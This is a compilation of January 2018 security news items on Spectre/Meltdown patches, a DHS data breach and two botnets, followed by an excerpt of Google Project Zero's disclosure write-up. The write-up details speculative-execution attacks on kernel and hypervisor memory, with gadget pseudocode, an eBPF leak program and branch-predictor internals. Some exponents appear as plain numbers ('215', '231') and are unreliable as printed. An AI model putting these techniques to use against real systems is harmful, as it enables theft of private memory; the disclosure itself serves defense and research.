While the main attack vector is via local access (e.g. a piece of malware installed on the targeted machine), researchers say remote attacks via JavaScript are also possible, particularly in the case of Spectre.

Researchers have developed a proof-of-concept (PoC) for Google Chrome that uses JavaScript to exploit Spectre and read private memory from the process in which it runs.

Spectre attack JavaScript PoC

Mozilla has conducted internal experiments and determined that these techniques can be used “from Web content to read private information between different origins.” While the issue is still under investigation, the organization has decided to implement some partial protections in Firefox 57.

Google pointed out that attacks are possible via both JavaScript and WebAssembly. The company informed customers that current versions of Chrome include a feature named Site Isolation that can be manually enabled to prevent attacks. Chrome 64, which is scheduled for release on January 23, will contain mitigations in the V8 JavaScript engine. Other hardening measures will be included in future versions, but the tech giant warned that they may have a negative impact on performance.

Microsoft has also confirmed that attacks can be launched via JavaScript code running in the browser. The company has released updates for its Edge and Internet Explorer web browsers to mitigate the vulnerabilities.

Since a JavaScript PoC is available, experts believe it’s only a matter of time until malicious actors start exploiting the flaws remotely. While some say state-sponsored actors are most likely to leverage these attacks, others point out that mass exploitation is also possible, particularly via the ads served by websites.

That is why some experts have advised users to disable JavaScript in their browser and install ad blockers.

Mike Buckbee, security engineer at Varonis, noted that while exploitation via the browser might not give attackers access to files, they are still likely to find valuable data in the memory, including SSH keys, security tokens and passwords.

While affected vendors say there is no evidence that Spectre and Meltdown have been exploited prior to their disclosure, the researchers who discovered the vulnerabilities warn that attacks are not easy to detect.

Researcher Jake Williams said, “It's reasonable to assume that most nation states had Spectre and Meltdown before public announcement. If by some miracle they weren't already using these, they will be now.”

Bryce Boland, Asia Pacific Chief Technology Officer at FireEye, agrees. “Nation state hackers typically use these types of vulnerabilities to develop new attack tools, and that's likely in this case,” he said.

Sam Curry, Chief Security Officer at Cybereason, also believes sophisticated actors will likely exploit the flaws, if they haven’t done so already.

“This isn't yet doom and gloom but the tension will rise. And don't be surprised if it comes to light that a nation state is already using this or if a catalyst in the form of hack or research further heats this up and makes it a more clear-and-present risk in 2018.


247,000 DHS Employees Affected by Data Breach
4.1.2018 securityweek Incindent
Information on nearly a quarter million Department of Homeland Security (DHS) employees was exposed as part of an "unauthorized transfer of data", the DHS announced.

The privacy incident involved a database used by the DHS Office of the Inspector General (OIG) which was stored in the DHS OIG Case Management System.

The incident impacted approximately 247,167 current and former federal employees that were employed by DHS in 2014. The exposed Personally identifiable information (PII) of these individuals includes names, Social Security numbers, birth dates, positions, grades, and duty stations.

Individuals (both DHS employees and non-DHS employees) associated with DHS OIG investigations from 2002 through 2014 (including subjects, witnesses, and complainants) were also affected by the incident, the DHS said.

The PII associated with these individuals varies depending on the documentation and evidence collected for a given case and could include names, social security numbers, alien registration numbers, dates of birth, email addresses, phone numbers, addresses, and personal information provided in interviews with DHS OIG investigative agents.

The data breach wasn’t the result of an external attack, the DHS claims. The leaked data was found in an unauthorized copy of the DHS OIG investigative case management system that was in the possession of a former DHS OIG employee.

The data breach was discovered on May 10, 2017, as part of an ongoing criminal investigation conducted by DHS OIG and the U.S. Attorney’s Office.

“The privacy incident did not stem from a cyber-attack by external actors, and the evidence indicates that affected individual’s personal information was not the primary target of the unauthorized exfiltration,” DHS explained.

The Department said that notification letters were sent to select DHS employees to inform them that they might have been impacted. DHS also says that it conducted a thorough privacy investigation, a forensic analysis of the compromised data, and assessed the risk to affected individuals before making the incident public.

Following the incident, the DHS says it is implementing additional security precautions to limit access to the type of information that was released in this incident and to better identify unusual access patterns.

“We will continue to review our systems and practices in order to better secure data. DHS OIG has also implemented a number of security precautions to further secure the DHS OIG network,” DHS notes.

Additional information for the affected individuals is available in an announcement and FAQ published on Jan 3.


Tech Giants Address Critical CPU Vulnerabilities
4.1.2018 securityweek
Vulnerebility
Several major tech companies have started releasing patches and mitigations for the recently disclosed Meltdown and Spectre vulnerabilities affecting CPUs from Intel, AMD and ARM.

The flaws exploited by the Meltdown and Spectre attacks, tracked as CVE-2017-5715, CVE-2017-5753 and CVE-2017-5754, allow malicious applications to bypass memory isolation mechanisms and access data as it’s being processed. This can include passwords, photos, documents, emails, and data from instant messaging apps.

Billions of PCs, smartphones and cloud instances are affected, and while there is no evidence of attacks in the wild, researchers said exploitation attempts are unlikely to be detected.

Meltdown

Attacks can be prevented using kernel page table isolation (KPTI), a hardening technique designed to improve security by isolating kernel from user memory. However, the mitigation can introduce performance penalties of up to 30 percent for affected processors.

Researchers had initially planned on disclosing the security holes on January 9, but disclosure was moved up due to media reports and speculation surrounding the topic. Affected tech companies have already started informing users about the risks and the availability of patches and mitigations.

Intel, AMD and ARM

Initial reports claimed only Intel CPUs were affected by the vulnerabilities. While Intel was hit the hardest, some of the flaws affect AMD and ARM as well.

Intel has informed customers that it’s working with manufacturers and operating system vendors to address the issues. The company also reassured customers that performance penalties will not affect regular computer users and will be mitigated over time.

Spectre

AMD is apparently only affected by the Spectre vulnerabilities (CVE-2017-5753 and CVE-2017-5715), and the company claims the risk to its processors is “near zero” thanks to their architecture.

In the case of ARM, the company says only its Cortex-A75 processors are affected by all three vulnerabilities. Cortex R7, R8, A8, A9, A15, A17, A57, A72 and A73 processors are vulnerable to Meltdown attacks and affected by the CVE-2017-5715 Spectre flaw. Other existing products and future processors are not affected, the company said.

ARM has provided kernel patches for Linux users and advised customers using Android and other OSs to check for updates from their respective vendor.

Google

Google has patched the vulnerabilities in its Cloud platform, but some users may need to manually perform some tasks.

“Google Compute Engine used VM Live Migration technology to perform host system and hypervisor updates with no user impact, no forced maintenance windows, and no mass reboots required. However, all guest operating systems and versions must be patched to protect against this new class of attack regardless of where those systems run,” Google said.

The company has informed Android users that while the risk of attacks is small, the latest Android security updates do provide additional protection against Spectre and Meltdown.

Microsoft

Microsoft started implementing protections in Windows a few months ago. The company informed customers on Wednesday that it released several updates to help mitigate the vulnerabilities in Windows client and server products. It has also released a tool designed to tell customers if protections are enabled.

Microsoft is also working to ensure that customers of its Azure cloud platform are not vulnerable to Meltdown and Spectre attacks.

“The majority of Azure infrastructure has already been updated to address this vulnerability. Some aspects of Azure are still being updated and require a reboot of customer VMs for the security update to take effect,” the company said.

Apple

Apple has yet to make any public statements, but security expert Alex Ionescu reported that version 10.13.2 of macOS High Sierra, which Apple released on December 6, does fix the vulnerabilities.

Xen, Amazon Web Services (AWS), DigitalOcean, Rackspace

The Xen Project said systems running any version of the Xen hypervisor are affected. Due to the accelerated disclosure, the organization has not had time to create patches, and mitigations are available for only one of the security holes.

AWS, which uses Xen, told customers, “All but a small single-digit percentage of instances across the Amazon EC2 fleet are already protected. The remaining ones will be completed in the next several hours, with associated instance maintenance notifications.”

Rackspace, which also uses Xen, is currently investigating the issue. DigitalOcean has also launched an investigation, but the company has blamed Intel’s embargo for not determining potential impact sooner.

Mozilla

Mozilla has conducted some internal experiments and found that it is possible to use techniques similar to Meltdown and Spectre from web content to read private date between different origins. The full extent of the issue has yet to be determined, but some partial mitigations have already been added to Firefox

Red Hat

Red Hat has classified the vulnerabilities as important and it has already developed kernel updates for affected versions of Red Hat Enterprise Linux.

“We are working with our customers and partners to make these updates available, along with the information our customers need to quickly secure their physical systems, virtual images, and container-based deployments,” said Chris Robinson, manager of Product Security Assurance at Red Hat.

nVIDIA

nVIDIA said its GPU hardware does not appear to be impacted by Meltdown and Spectre, but some system-on-a-chip (SoC) products using ARM CPUs are vulnerable. The company is working on identifying affected products and preparing mitigations.


Crypto-Miner Botnet Spreads over SSH
4.1.2018 securityweek BotNet
A recently discovered Linux crypto-miner botnet spreading over the SSH protocol is based on the Python scripting language, which makes it difficult to detect, F5 Networks has discovered.

Dubbed PyCryptoMiner, the botnet is using Pastebin to receive new command and control server (C&C) assignments when the original C&C isn’t available. Under active development, the botnet recently added scanner functionality hunting for vulnerable JBoss servers (exploiting CVE-2017-12149), F5 says.

Designed to mine for Monero, a highly anonymous crypto-currency, the botnet is estimated to have generated the equivalent of approximately $46,000 as of late December.

PyCryptoMiner isn’t the only botnet targeting online Linux systems, but because of its scripting language-based nature, the malware is more evasive and be easily obfuscated. Furthermore, it is executed by a legitimate binary, F5's researchers discovered.

The botnet spreads by attempting to guess the SSH login credentials of target Linux machines. If the credentials are successfully discovered, the attacking bot deploys a simple base64-encoded spearhead Python script designed to connect to the C&C server to download and execute additional Python code.

The second-stage code is the main bot controller, which registers a cron job on the infected machine to create persistency.

The original spearhead bash script also collects information on the infected device, including Host/DNS name, OS name and architecture, number of CPUs, and CPU usage. It also checks whether the machine has been already infected and whether the bot is used for crypto-mining or scanning.

The bot then sends a report with the collected information to the C&C, which responds with task details. Tasks include arbitrary commands to be executed, update, identifier so the C&C can synchronize botnet results, and time interval to poll the C&C. The bot sends an output of the executed task to the C&C.

In mid-December, the botnet was updated with code to scan for vulnerable JBoss servers, in an attempt to exploit CVE-2017-12149, a vulnerability disclosed several months ago.

“The list of the targets to scan is controlled by the C&C server, while the bot has a separate thread that polls the C&C server for new targets. The server responds with a Class C IP range to scan but could also provide a single IP address,” the researchers reveal.

The botnet uses two pool addresses that show approximately 94 and 64 Monero, with a value of around $60,000. However, the researchers are uncertain how much profit the threat actor behind the malware has made overall.

Unlike other malware that has the C&C server address hardcoded, which causes bots to become unreachable when the server is taken down, the botnet uses Pastebin to publish an alternate C&C server address if the original one is unreachable.

According to F5, with all C&C servers of the botnet inaccessible at this moment, all newly infected bots are idle, polling for the attacker’s Pastebin.com page, which could be updated at any time.

The page allowed researchers to determine that the botnet might have been active since August 2017, and that the resource had been viewed 177,987 times at the time of the investigation. However, the researchers couldn’t determine the exact size of the botnet, as a single bot could periodically ask the resource if the C&C server is down.

Looking at other resources created by the same actor, who uses the moniker “WHATHAPPEN”, the researchers discovered 235 email addresses and more than 36,000 domains associated with them. The registrant has been involved in scams, gambling, and adult services since 2012.

“Our research is still ongoing while we hunt for more missing pieces of this puzzle, such as the “scanner node” component and additional C&C servers, if there are any. We are also waiting to see whether the current C&C server will come back to life,” F5 notes.


Andromeda Botnet to Die Slow, Painful Death After Takedown
4.1.2018 securityweek BotNet
Following a takedown operation in early December 2017, the Andromeda botnet is expected to slowly disappear from the threat landscape, ESET says.

Also known as Wauchos or Gamarue, the botnet has been around since at least September 2011 and lived through five major versions over the years. The Andromeda malware was detected or blocked on an average of around 1.1 million machines every month over the six months leading to the takedown.

The botnet was mainly used for stealing credentials and to download and install additional malware onto compromised systems. Thus, systems infected with Andromeda would likely have other threats installed on them as well, ESET says.

Some of the threats usually distributed via Andromeda included Kasidet, also known as Neutrino bot, which can launch distributed denial-of-service (DDoS) attacks, and Kelihos and Lethic, which are notorious spambots known for their involvement in massive junk mail campaigns. It was also used for the distribution of the Dridex banking Trojan and point-of-sale (PoS) malware GamaPoS.

Andromeda was distributed through various methods, including social media, instant messaging, removable media, spam, drive-by downloads, and exploit kits. Because it didn’t conduct targeted attacks, the malware could infect any computer if the user clicked on malicious links.

Since there were no obvious signs to alert the user on the infection, the botnet managed to remain hidden and compromise a large number of systems. Featuring a modular design, the botnet could get additional capabilities through plugins such as a keylogger, a form grabber, and a rootkit.

ESET Senior Malware Researcher Jean-Ian Boutin, who was involved in the takedown operation, explains that the botnet’s numerous features and continuous development made it appealing to cybercriminals interested in using it. Thus, Andromeda was able to survive for a long period of time and to also become a prevalent threat.

At the time of Andromeda’s takedown, security researchers identified 464 distinct botnets, 80 associated malware families, and 1,214 domains and IP addresses of the botnet’s command and control (C&C) servers.

The takedown operation, a joint effort from the FBI, the Luneburg Central Criminal Investigation Inspectorate in Germany, Europol’s European Cybercrime Centre (EC3), the Joint Cybercrime Action Task Force (J-CAT), Eurojust, and private-sector partners, built on information gathered during the shutdown of a large criminal network known as Avalanche.

According to Boutin, investigators started gathering information and evidence in 2015 and needed a lot of time to get everything ready for a law enforcement operation. Following the takedown, authorities seized control of Andromeda’s C&C servers and the botnet is expected to slowly disappear.

“It will probably slowly disappear as remediation is under way. For this type of long-lived botnet, it is very hard to clean all the systems that have been compromised by Wauchos, but as long as the good guys are in control of the C&C servers, at least no new harm can be done to those compromised PCs,” Boutin says.


Reading privileged memory with a side-channel
4.1.2017 Google Projet Zero
Vulnerebility blog

We have discovered that CPU data cache timing can be abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual memory read vulnerabilities across local security boundaries in various contexts.

Variants of this issue are known to affect many modern processors, including certain processors by Intel, AMD and ARM. For a few Intel and AMD CPU models, we have exploits that work against real software. We reported this issue to Intel, AMD and ARM on 2017-06-01 [1].

So far, there are three known variants of the issue:

Variant 1: bounds check bypass (CVE-2017-5753)
Variant 2: branch target injection (CVE-2017-5715)
Variant 3: rogue data cache load (CVE-2017-5754)

Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at:

Spectre (variants 1 and 2)
Meltdown (variant 3)

During the course of our research, we developed the following proofs of concept (PoCs):

A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.
A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel's BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]
A PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian's distro kernel [5] running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should be much faster, but that hasn't been tested.)
A PoC for variant 3 that, when running with normal user privileges, can read kernel memory on the Intel Haswell Xeon CPU under some precondition. We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

For interesting resources around this topic, look down into the "Literature" section.

A warning regarding explanations about processor internals in this blogpost: This blogpost contains a lot of speculation about hardware internals based on observed behavior, which might not necessarily correspond to what processors are actually doing.

We have some ideas on possible mitigations and provided some of those ideas to the processor vendors; however, we believe that the processor vendors are in a much better position than we are to design and evaluate mitigations, and we expect them to be the source of authoritative guidance.

The PoC code and the writeups that we sent to the CPU vendors will be made available at a later date.
Tested Processors
Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called "Intel Haswell Xeon CPU" in the rest of this document)
AMD FX(tm)-8320 Eight-Core Processor (called "AMD FX CPU" in the rest of this document)
AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called "AMD PRO CPU" in the rest of this document)
An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called "ARM Cortex A57" in the rest of this document)
Glossary
retire: An instruction retires when its results, e.g. register writes and memory writes, are committed and made visible to the rest of the system. Instructions can be executed out of order, but must always retire in order.

logical processor core: A logical processor core is what the operating system sees as a processor core. With hyperthreading enabled, the number of logical cores is a multiple of the number of physical cores.

cached/uncached data: In this blogpost, "uncached" data is data that is only present in main memory, not in any of the cache levels of the CPU. Loading uncached data will typically take over 100 cycles of CPU time.

speculative execution: A processor can execute past a branch without knowing whether it will be taken or where its target is, therefore executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.

mis-speculation window: The time window during which the CPU speculatively executes the wrong code and has not yet detected that mis-speculation has occurred.
Variant 1: Bounds check bypass
This section explains the common theory behind all three variants and the theory behind our PoC for variant 1 that, when running in userspace under a Debian distro kernel, can perform arbitrary reads in a 4GiB region of kernel memory in at least the following configurations:

Intel Haswell Xeon CPU, eBPF JIT is off (default state)
Intel Haswell Xeon CPU, eBPF JIT is on (non-default state)
AMD PRO CPU, eBPF JIT is on (non-default state)

The state of the eBPF JIT can be toggled using the net.core.bpf_jit_enable sysctl.
Theoretical explanation
The Intel Optimization Reference Manual says the following regarding Sandy Bridge (and later microarchitectural revisions) in section 2.3.2.3 ("Branch Prediction"):

Branch prediction predicts the branch target and enables the
processor to begin executing instructions long before the branch
true execution path is known.

In section 2.3.5.2 ("L1 DCache"):

Loads can:
[...]
Be carried out speculatively, before preceding branches are resolved.
Take cache misses out of order and in an overlapped manner.

Intel's Software Developer's Manual [7] states in Volume 3A, section 11.7 ("Implicit Caching (Pentium 4, Intel Xeon, and P6 family processors"):

Implicit caching occurs when a memory element is made potentially cacheable, although the element may never have been accessed in the normal von Neumann sequence. Implicit caching occurs on the P6 and more recent processor families due to aggressive prefetching, branch prediction, and TLB miss handling. Implicit caching is an extension of the behavior of existing Intel386, Intel486, and Pentium processor systems, since software running on these processor families also has not been able to deterministically predict the behavior of instruction prefetch.
Consider the code sample below. If arr1->length is uncached, the processor can speculatively load data from arr1->data[untrusted_offset_from_caller]. This is an out-of-bounds read. That should not matter because the processor will effectively roll back the execution state when the branch has executed; none of the speculatively executed instructions will retire (e.g. cause registers etc. to be affected).

struct array {
unsigned long length;
unsigned char data[];
};
struct array *arr1 = ...;
unsigned long untrusted_offset_from_caller = ...;
if (untrusted_offset_from_caller < arr1->length) {
unsigned char value = arr1->data[untrusted_offset_from_caller];
...
}
However, in the following code sample, there's an issue. If arr1->length, arr2->data[0x200] and arr2->data[0x300] are not cached, but all other accessed data is, and the branch conditions are predicted as true, the processor can do the following speculatively before arr1->length has been loaded and the execution is re-steered:

load value = arr1->data[untrusted_offset_from_caller]
start a load from a data-dependent offset in arr2->data, loading the corresponding cache line into the L1 cache

struct array {
unsigned long length;
unsigned char data[];
};
struct array *arr1 = ...; /* small array */
struct array *arr2 = ...; /* array of size 0x400 */
/* >0x400 (OUT OF BOUNDS!) */
unsigned long untrusted_offset_from_caller = ...;
if (untrusted_offset_from_caller < arr1->length) {
unsigned char value = arr1->data[untrusted_offset_from_caller];
unsigned long index2 = ((value&1)*0x100)+0x200;
if (index2 < arr2->length) {
unsigned char value2 = arr2->data[index2];
}
}

After the execution has been returned to the non-speculative path because the processor has noticed that untrusted_offset_from_caller is bigger than arr1->length, the cache line containing arr2->data[index2] stays in the L1 cache. By measuring the time required to load arr2->data[0x200] and arr2->data[0x300], an attacker can then determine whether the value of index2 during speculative execution was 0x200 or 0x300 - which discloses whether arr1->data[untrusted_offset_from_caller]&1 is 0 or 1.

To be able to actually use this behavior for an attack, an attacker needs to be able to cause the execution of such a vulnerable code pattern in the targeted context with an out-of-bounds index. For this, the vulnerable code pattern must either be present in existing code, or there must be an interpreter or JIT engine that can be used to generate the vulnerable code pattern. So far, we have not actually identified any existing, exploitable instances of the vulnerable code pattern; the PoC for leaking kernel memory using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the kernel and accessible to normal users.

A minor variant of this could be to instead use an out-of-bounds read to a function pointer to gain control of execution in the mis-speculated path. We did not investigate this variant further.
Attacking the kernel
This section describes in more detail how variant 1 can be used to leak Linux kernel memory using the eBPF bytecode interpreter and JIT engine. While there are many interesting potential targets for variant 1 attacks, we chose to attack the Linux in-kernel eBPF JIT/interpreter because it provides more control to the attacker than most other JITs.

The Linux kernel supports eBPF since version 3.18. Unprivileged userspace code can supply bytecode to the kernel that is verified by the kernel and then:

either interpreted by an in-kernel bytecode interpreter
or translated to native machine code that also runs in kernel context using a JIT engine (which translates individual bytecode instructions without performing any further optimizations)

Execution of the bytecode can be triggered by attaching the eBPF bytecode to a socket as a filter and then sending data through the other end of the socket.

Whether the JIT engine is enabled depends on a run-time configuration setting - but at least on the tested Intel processor, the attack works independent of that setting.

Unlike classic BPF, eBPF has data types like data arrays and function pointer arrays into which eBPF bytecode can index. Therefore, it is possible to create the code pattern described above in the kernel using eBPF bytecode.

eBPF's data arrays are less efficient than its function pointer arrays, so the attack will use the latter where possible.

Both machines on which this was tested have no SMAP, and the PoC relies on that (but it shouldn't be a precondition in principle).

Additionally, at least on the Intel machine on which this was tested, bouncing modified cache lines between cores is slow, apparently because the MESI protocol is used for cache coherence [8]. Changing the reference counter of an eBPF array on one physical CPU core causes the cache line containing the reference counter to be bounced over to that CPU core, making reads of the reference counter on all other CPU cores slow until the changed reference counter has been written back to memory. Because the length and the reference counter of an eBPF array are stored in the same cache line, this also means that changing the reference counter on one physical CPU core causes reads of the eBPF array's length to be slow on other physical CPU cores (intentional false sharing).

The attack uses two eBPF programs. The first one tail-calls through a page-aligned eBPF function pointer array prog_map at a configurable index. In simplified terms, this program is used to determine the address of prog_map by guessing the offset from prog_map to a userspace address and tail-calling through prog_map at the guessed offsets. To cause the branch prediction to predict that the offset is below the length of prog_map, tail calls to an in-bounds index are performed in between. To increase the mis-speculation window, the cache line containing the length of prog_map is bounced to another core. To test whether an offset guess was successful, it can be tested whether the userspace address has been loaded into the cache.

Because such straightforward brute-force guessing of the address would be slow, the following optimization is used: 215 adjacent userspace memory mappings [9], each consisting of 24 pages, are created at the userspace address user_mapping_area, covering a total area of 231 bytes. Each mapping maps the same physical pages, and all mappings are present in the pagetables.

This permits the attack to be carried out in steps of 231 bytes. For each step, after causing an out-of-bounds access through prog_map, only one cache line each from the first 24 pages of user_mapping_area have to be tested for cached memory. Because the L3 cache is physically indexed, any access to a virtual address mapping a physical page will cause all other virtual addresses mapping the same physical page to become cached as well.

When this attack finds a hit—a cached memory location—the upper 33 bits of the kernel address are known (because they can be derived from the address guess at which the hit occurred), and the low 16 bits of the address are also known (from the offset inside user_mapping_area at which the hit was found). The remaining part of the address of user_mapping_area is the middle.

The remaining bits in the middle can be determined by bisecting the remaining address space: Map two physical pages to adjacent ranges of virtual addresses, each virtual address range the size of half of the remaining search space, then determine the remaining address bit-wise.

At this point, a second eBPF program can be used to actually leak data. In pseudocode, this program looks as follows:

uint64_t bitmask = <runtime-configurable>;
uint64_t bitshift_selector = <runtime-configurable>;
uint64_t prog_array_base_offset = <runtime-configurable>;
uint64_t secret_data_offset = <runtime-configurable>;
// index will be bounds-checked by the runtime,
// but the bounds check will be bypassed speculatively
uint64_t secret_data = bpf_map_read(array=victim_array, index=secret_data_offset);
// select a single bit, move it to a specific position, and add the base offset
uint64_t progmap_index = (((secret_data & bitmask) >> bitshift_selector) << 7) + prog_array_base_offset;
bpf_tail_call(prog_map, progmap_index);

This program reads 8-byte-aligned 64-bit values from an eBPF data array "victim_map" at a runtime-configurable offset and bitmasks and bit-shifts the value so that one bit is mapped to one of two values that are 27 bytes apart (sufficient to not land in the same or adjacent cache lines when used as an array index). Finally it adds a 64-bit offset, then uses the resulting value as an offset into prog_map for a tail call.

This program can then be used to leak memory by repeatedly calling the eBPF program with an out-of-bounds offset into victim_map that specifies the data to leak and an out-of-bounds offset into prog_map that causes prog_map + offset to point to a userspace memory area. Misleading the branch prediction and bouncing the cache lines works the same way as for the first eBPF program, except that now, the cache line holding the length of victim_map must also be bounced to another core.
Variant 2: Branch target injection
This section describes the theory behind our PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific version of Debian's distro kernel running on the host, can read host kernel memory at a rate of around 1500 bytes/second.
Basics
Prior research (see the Literature section at the end) has shown that it is possible for code in separate security contexts to influence each other's branch prediction. So far, this has only been used to infer information about where code is located (in other words, to create interference from the victim to the attacker); however, the basic hypothesis of this attack variant is that it can also be used to redirect execution of code in the victim context (in other words, to create interference from the attacker to the victim; the other way around).

The basic idea for the attack is to target victim code that contains an indirect branch whose target address is loaded from memory and flush the cache line containing the target address out to main memory. Then, when the CPU reaches the indirect branch, it won't know the true destination of the jump, and it won't be able to calculate the true destination until it has finished loading the cache line back into the CPU, which takes a few hundred cycles. Therefore, there is a time window of typically over 100 cycles in which the CPU will speculatively execute instructions based on branch prediction.
Haswell branch prediction internals
Some of the internals of the branch prediction implemented by Intel's processors have already been published; however, getting this attack to work properly required significant further experimentation to determine additional details.

This section focuses on the branch prediction internals that were experimentally derived from the Intel Haswell Xeon CPU.

Haswell seems to have multiple branch prediction mechanisms that work very differently:

A generic branch predictor that can only store one target per source address; used for all kinds of jumps, like absolute jumps, relative jumps and so on.
A specialized indirect call predictor that can store multiple targets per source address; used for indirect calls.
(There is also a specialized return predictor, according to Intel's optimization manual, but we haven't analyzed that in detail yet. If this predictor could be used to reliably dump out some of the call stack through which a VM was entered, that would be very interesting.)
Generic predictor
The generic branch predictor, as documented in prior research, only uses the lower 31 bits of the address of the last byte of the source instruction for its prediction. If, for example, a branch target buffer (BTB) entry exists for a jump from 0x4141.0004.1000 to 0x4141.0004.5123, the generic predictor will also use it to predict a jump from 0x4242.0004.1000. When the higher bits of the source address differ like this, the higher bits of the predicted destination change together with it—in this case, the predicted destination address will be 0x4242.0004.5123—so apparently this predictor doesn't store the full, absolute destination address.

Before the lower 31 bits of the source address are used to look up a BTB entry, they are folded together using XOR. Specifically, the following bits are folded together:

bit A
bit B
0x40.0000
0x2000
0x80.0000
0x4000
0x100.0000
0x8000
0x200.0000
0x1.0000
0x400.0000
0x2.0000
0x800.0000
0x4.0000
0x2000.0000
0x10.0000
0x4000.0000
0x20.0000

In other words, if a source address is XORed with both numbers in a row of this table, the branch predictor will not be able to distinguish the resulting address from the original source address when performing a lookup. For example, the branch predictor is able to distinguish source addresses 0x100.0000 and 0x180.0000, and it can also distinguish source addresses 0x100.0000 and 0x180.8000, but it can't distinguish source addresses 0x100.0000 and 0x140.2000 or source addresses 0x100.0000 and 0x180.4000. In the following, this will be referred to as aliased source addresses.

When an aliased source address is used, the branch predictor will still predict the same target as for the unaliased source address. This indicates that the branch predictor stores a truncated absolute destination address, but that hasn't been verified.

Based on observed maximum forward and backward jump distances for different source addresses, the low 32-bit half of the target address could be stored as an absolute 32-bit value with an additional bit that specifies whether the jump from source to target crosses a 232 boundary; if the jump crosses such a boundary, bit 31 of the source address determines whether the high half of the instruction pointer should increment or decrement.
Indirect call predictor
The inputs of the BTB lookup for this mechanism seem to be:

The low 12 bits of the address of the source instruction (we are not sure whether it's the address of the first or the last byte) or a subset of them.
The branch history buffer state.

If the indirect call predictor can't resolve a branch, it is resolved by the generic predictor instead. Intel's optimization manual hints at this behavior: "Indirect Calls and Jumps. These may either be predicted as having a monotonic target or as having targets that vary in accordance with recent program behavior."

The branch history buffer (BHB) stores information about the last 29 taken branches - basically a fingerprint of recent control flow - and is used to allow better prediction of indirect calls that can have multiple targets.

The update function of the BHB works as follows (in pseudocode; src is the address of the last byte of the source instruction, dst is the destination address):

void bhb_update(uint58_t *bhb_state, unsigned long src, unsigned long dst) {
*bhb_state <<= 2;
*bhb_state ^= (dst & 0x3f);
*bhb_state ^= (src & 0xc0) >> 6;
*bhb_state ^= (src & 0xc00) >> (10 - 2);
*bhb_state ^= (src & 0xc000) >> (14 - 4);
*bhb_state ^= (src & 0x30) << (6 - 4);
*bhb_state ^= (src & 0x300) << (8 - 8);
*bhb_state ^= (src & 0x3000) >> (12 - 10);
*bhb_state ^= (src & 0x30000) >> (16 - 12);
*bhb_state ^= (src & 0xc0000) >> (18 - 14);
}

Some of the bits of the BHB state seem to be folded together further using XOR when used for a BTB access, but the precise folding function hasn't been understood yet.

The BHB is interesting for two reasons. First, knowledge about its approximate behavior is required in order to be able to accurately cause collisions in the indirect call predictor. But it also permits dumping out the BHB state at any repeatable program state at which the attacker can execute code - for example, when attacking a hypervisor, directly after a hypercall. The dumped BHB state can then be used to fingerprint the hypervisor or, if the attacker has access to the hypervisor binary, to determine the low 20 bits of the hypervisor load address (in the case of KVM: the low 20 bits of the load address of kvm-intel.ko).
Reverse-Engineering Branch Predictor Internals
This subsection describes how we reverse-engineered the internals of the Haswell branch predictor. Some of this is written down from memory, since we didn't keep a detailed record of what we were doing.

We initially attempted to perform BTB injections into the kernel using the generic predictor, using the knowledge from prior research that the generic predictor only looks at the lower half of the source address and that only a partial target address is stored. This kind of worked - however, the injection success rate was very low, below 1%. (This is the method we used in our preliminary PoCs for method 2 against modified hypervisors running on Haswell.)

We decided to write a userspace test case to be able to more easily test branch predictor behavior in different situations.

Based on the assumption that branch predictor state is shared between hyperthreads [10], we wrote a program of which two instances are each pinned to one of the two logical processors running on a specific physical core, where one instance attempts to perform branch injections while the other measures how often branch injections are successful. Both instances were executed with ASLR disabled and had the same code at the same addresses. The injecting process performed indirect calls to a function that accesses a (per-process) test variable; the measuring process performed indirect calls to a function that tests, based on timing, whether the per-process test variable is cached, and then evicts it using CLFLUSH. Both indirect calls were performed through the same callsite. Before each indirect call, the function pointer stored in memory was flushed out to main memory using CLFLUSH to widen the speculation time window. Additionally, because of the reference to "recent program behavior" in Intel's optimization manual, a bunch of conditional branches that are always taken were inserted in front of the indirect call.

In this test, the injection success rate was above 99%, giving us a base setup for future experiments.

We then tried to figure out the details of the prediction scheme. We assumed that the prediction scheme uses a global branch history buffer of some kind.

To determine the duration for which branch information stays in the history buffer, a conditional branch that is only taken in one of the two program instances was inserted in front of the series of always-taken conditional jumps, then the number of always-taken conditional jumps (N) was varied. The result was that for N=25, the processor was able to distinguish the branches (misprediction rate under 1%), but for N=26, it failed to do so (misprediction rate over 99%).
Therefore, the branch history buffer had to be able to store information about at least the last 26 branches.

The code in one of the two program instances was then moved around in memory. This revealed that only the lower 20 bits of the source and target addresses have an influence on the branch history buffer.

Testing with different types of branches in the two program instances revealed that static jumps, taken conditional jumps, calls and returns influence the branch history buffer the same way; non-taken conditional jumps don't influence it; the address of the last byte of the source instruction is the one that counts; IRETQ doesn't influence the history buffer state (which is useful for testing because it permits creating program flow that is invisible to the history buffer).

